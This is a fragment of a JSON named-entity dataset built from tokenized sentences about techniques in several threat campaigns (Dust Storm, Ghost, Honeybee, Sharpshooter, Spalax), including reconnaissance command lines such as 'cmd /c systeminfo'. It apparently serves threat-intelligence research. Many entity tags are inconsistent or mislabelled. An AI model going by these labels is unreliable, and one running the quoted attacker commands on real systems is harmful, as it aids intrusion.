"Storm,", + "the", + "threat", + "actors", + "relied", + "on", + "potential", + "victims", + "to", + "open", + "a", + "malicious", + "Microsoft", + "Word", + "document", + "sent", + "via", + "email." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "relied", + "on", + "a", + "victim", + "clicking", + "on", + "a", + "malicious", + "link", + "sent", + "via", + "email." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "disguised", + "some", + "executables", + "as", + "JPG", + "files." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "executed", + "JavaScript", + "code", + "via", + "`mshta.exe`." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "deployed", + "a", + "file", + "called", + "`DeployJava.js`", + "to", + "fingerprint", + "installed", + "software", + "on", + "a", + "victim", + "system", + "prior", + "to", + "exploit", + "delivery." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "used", + "UPX", + "to", + "pack", + "some", + "payloads." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "sent", + "spearphishing", + "emails", + "that", + "contained", + "a", + "malicious", + "Microsoft", + "Word", + "document." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "sent", + "spearphishing", + "emails", + "containing", + "a", + "malicious", + "link." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Dust", + "Storm,", + "the", + "threat", + "actors", + "used", + "Visual", + "Basic", + "scripts." + ], + "ner_tags": [ + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Ghost,", + "APT29", + "used", + "social", + "media", + "platforms", + "to", + "hide", + "communications", + "to", + "C2", + "servers." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "B-Idus", + "O", + "B-Tool", + "B-Idus", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Ghost,", + "APT29", + "used", + "stolen", + "administrator", + "credentials", + "for", + "lateral", + "movement", + "on", + "compromised", + "networks." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Ghost,", + "APT29", + "registered", + "domains", + "for", + "use", + "in", + "C2", + "including", + "some", + "crafted", + "to", + "appear", + "as", + "existing", + "legitimate", + "domains." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Ghost,", + "APT29", + "used", + "new", + "strains", + "of", + "malware", + "including", + "FatDuke,", + "MiniDuke,", + "RegDuke,", + "and", + "PolyglotDuke." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Ghost,", + "APT29", + "registered", + "Twitter", + "accounts", + "to", + "host", + "C2", + "nodes." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Ghost,", + "APT29", + "used", + "steganography", + "to", + "hide", + "payloads", + "inside", + "valid", + "images." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Ghost,", + "APT29", + "used", + "steganography", + "to", + "hide", + "the", + "communications", + "between", + "the", + "implants", + "and", + "their", + "C&C", + "servers." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Ghost,", + "APT29", + "used", + "WMI", + "event", + "subscriptions", + "to", + "establish", + "persistence", + "for", + "malware." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "B-Idus", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "uses", + "zip", + "to", + "pack", + "collected", + "files", + "before", + "exfiltration." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "used", + "the", + "malicious", + "NTWDBLIB.DLL", + "and", + "`cliconfig.exe`", + "to", + "bypass", + "UAC", + "protections." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "deployed", + "the", + "MaoCheng", + "dropper", + "with", + "a", + "stolen", + "Adobe", + "Systems", + "digital", + "signature." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "collected", + "data", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "malicious", + "files", + "were", + "decoded", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "stole", + "a", + "digital", + "signature", + "from", + "Adobe", + "Systems", + "to", + "use", + "with", + "their", + "MaoCheng", + "dropper." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "threat", + "actors", + "registered", + "domains", + "for", + "C2." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "attackers", + "created", + "email", + "addresses", + "to", + "register", + "for", + "a", + "free", + "account", + "for", + "a", + "control", + "server", + "used", + "for", + "the", + "implants." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "used", + "Base64", + "to", + "encode", + "files", + "with", + "a", + "custom", + "key." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "uploaded", + "stolen", + "files", + "to", + "their", + "C2", + "servers." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "used", + "batch", + "files", + "that", + "reduced", + "their", + "fingerprint", + "on", + "a", + "compromised", + "system", + "by", + "deleting", + "malware-related", + "files." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "had", + "the", + "ability", + "to", + "use", + "FTP", + "for", + "C2." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "used", + "a", + "malicious", + "DLL", + "to", + "search", + "for", + "files", + "with", + "specific", + "keywords." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "downloaded", + "additional", + "malware", + "and", + "malicious", + "scripts", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "B-Way", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "stolen", + "data", + "was", + "copied", + "into", + "a", + "text", + "file", + "using", + "the", + "format", + "`From", + "<COMPUTER-NAME>", + "(<Month>-<Day>", + "<Hour>-<Minute>-<Second>).txt`", + "prior", + "to", + "compression,", + "encoding,", + "and", + "exfiltration." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "threat", + "actors", + "relied", + "on", + "a", + "victim", + "to", + "enable", + "macros", + "within", + "a", + "malicious", + "Word", + "document." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "modified", + "the", + "MaoCheng", + "dropper", + "so", + "its", + "icon", + "appeared", + "as", + "a", + "Word", + "document." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "used", + "a", + "legitimate", + "Windows", + "executable", + "and", + "secure", + "directory", + "for", + "their", + "payloads", + "to", + "bypass", + "UAC." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "used", + "batch", + "files", + "that", + "modified", + "registry", + "keys." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "deployed", + "malware", + "that", + "used", + "API", + "calls,", + "including", + "`CreateProcessAsUser`." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "obtained", + "a", + "list", + "of", + "running", + "processes", + "on", + "a", + "victim", + "machine", + "using", + "`cmd", + "/c", + "tasklist", + ">", + "%temp%\\temp.ini`." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Honeybee,", + "at", + "least", + "one", + "identified", + "persona", + "was", + "used", + "to", + "register", + "for", + "a", + "free", + "account", + "for", + "a", + "control", + "server." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "threat", + "actors", + "ran", + "<code>sc", + "start</code>", + "to", + "start", + "the", + "COMSysApp", + "as", + "part", + "of", + "the", + "service", + "hijacking", + "and", + "<code>sc", + "stop</code>", + "to", + "stop", + "and", + "reconfigure", + "the", + "COMSysApp." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "used", + "a", + "batch", + "file", + "that", + "modified", + "the", + "COMSysApp", + "service", + "to", + "load", + "a", + "malicious", + "ipnet.dll", + "payload", + "and", + "to", + "load", + "a", + "DLL", + "into", + "the", + "`svchost.exe`", + "process." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "collected", + "the", + "computer", + "name,", + "OS,", + "and", + "other", + "system", + "information", + "using", + "`cmd", + "/c", + "systeminfo", + ">", + "%temp%\\", + "temp.ini`." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Honeybee,", + "the", + "threat", + "actors", + "used", + "a", + "Visual", + "Basic", + "script", + "embedded", + "within", + "a", + "Word", + "document", + "to", + "download", + "an", + "implant." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "various", + "implants", + "used", + "batch", + "scripting", + "and", + "`cmd.exe`", + "for", + "execution." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Honeybee,", + "threat", + "actors", + "installed", + "DLLs", + "and", + "backdoors", + "as", + "Windows", + "services." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Sharpshooter,", + "threat", + "actors", + "sent", + "malicious", + "Word", + "OLE", + "documents", + "to", + "victims." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Sharpshooter,", + "additional", + "payloads", + "were", + "downloaded", + "after", + "a", + "target", + "was", + "infected", + "with", + "a", + "first-stage", + "downloader." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Sharpshooter,", + "the", + "threat", + "actors", + "relied", + "on", + "victims", + "executing", + "malicious", + "Microsoft", + "Word", + "or", + "PDF", + "files." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Sharpshooter,", + "the", + "threat", + "actors", + "used", + "the", + "Rising", + "Sun", + "modular", + "backdoor." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Sharpshooter,", + "threat", + "actors", + "installed", + "Rising", + "Sun", + "in", + "the", + "Startup", + "folder", + "and", + "disguised", + "it", + "as", + "`mssync.exe`." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Sharpshooter,", + "the", + "first", + "stage", + "downloader", + "resolved", + "various", + "Windows", + "libraries", + "and", + "APIs,", + "including", + "`LoadLibraryA()`,", + "`GetProcAddress()`,", + "and", + "`CreateProcessA()`." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Way", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Sharpshooter,", + "threat", + "actors", + "leveraged", + "embedded", + "shellcode", + "to", + "inject", + "a", + "downloader", + "into", + "the", + "memory", + "of", + "Word." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Sharpshooter,", + "the", + "threat", + "actors", + "used", + "the", + "ExpressVPN", + "service", + "to", + "hide", + "their", + "location." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Sharpshooter,", + "a", + "first-stage", + "downloader", + "installed", + "Rising", + "Sun", + "to", + "`%Startup%\\mssync.exe`", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Sharpshooter,", + "the", + "threat", + "actors", + "compromised", + "a", + "server", + "they", + "used", + "as", + "part", + "of", + "the", + "campaign's", + "infrastructure." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Sharpshooter,", + "the", + "threat", + "actors", + "staged", + "malicious", + "files", + "on", + "Dropbox", + "and", + "other", + "websites." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Sharpshooter,", + "the", + "threat", + "actors", + "used", + "a", + "VBA", + "macro", + "to", + "execute", + "a", + "simple", + "downloader", + "that", + "installed", + "Rising", + "Sun." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Sharpshooter,", + "the", + "threat", + "actors", + "used", + "Dropbox", + "to", + "host", + "lure", + "documents", + "and", + "their", + "first-stage", + "downloader." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "used", + "Nullsoft", + "Scriptable", + "Install", + "System", + "(NSIS)", + "scripts", + "to", + "install", + "malware." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "used", + "a", + "variety", + "of", + "packers", + "and", + "droppers", + "to", + "decrypt", + "malicious", + "payloads." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "registered", + "hundreds", + "of", + "domains", + "using", + "Duck", + "DNS", + "and", + "DNS", + "Exit." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "used", + "dynamic", + "DNS", + "services,", + "including", + "Duck", + "DNS", + "and", + "DNS", + "Exit,", + "as", + "part", + "of", + "their", + "C2", + "infrastructure." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "used", + "XOR-encrypted", + "payloads." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "relied", + "on", + "a", + "victim", + "to", + "open", + "a", + "PDF", + "document", + "and", + "click", + "on", + "an", + "embedded", + "malicious", + "link", + "to", + "download", + "malware." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "relied", + "on", + "a", + "victim", + "to", + "click", + "on", + "a", + "malicious", + "link", + "distributed", + "via", + "phishing", + "emails." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "obtained", + "malware,", + "including", + "Remcos,", + "njRAT,", + "and", + "AsyncRAT." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "used", + "`rundll32.exe`", + "to", + "execute", + "malicious", + "installers." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "used", + "a", + "variety", + "of", + "packers,", + "including", + "CyaX,", + "to", + "obfuscate", + "malicious", + "executables." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "sent", + "phishing", + "emails", + "that", + "included", + "a", + "PDF", + "document", + "that", + "in", + "some", + "cases", + "led", + "to", + "the", + "download", + "and", + "execution", + "of", + "malware." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "sent", + "phishing", + "emails", + "to", + "victims", + "that", + "contained", + "a", + "malicious", + "link." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "used", + "packers", + "that", + "read", + "pixel", + "data", + "from", + "images", + "contained", + "in", + "PE", + "files'", + "resource", + "sections", + "and", + "build", + "the", + "next", + "layer", + "of", + "execution", + "from", + "the", + "data." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "obtained", + "packers", + "such", + "as", + "CyaX." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "staged", + "malware", + "and", + "malicious", + "files", + "in", + "legitimate", + "hosting", + "services", + "such", + "as", + "OneDrive", + "or", + "MediaFire." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "used", + "droppers", + "that", + "would", + "run", + "anti-analysis", + "checks", + "before", + "executing", + "malware", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Spalax,", + "the", + "threat", + "actors", + "used", + "OneDrive", + "and", + "MediaFire", + "to", + "host", + "payloads." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + 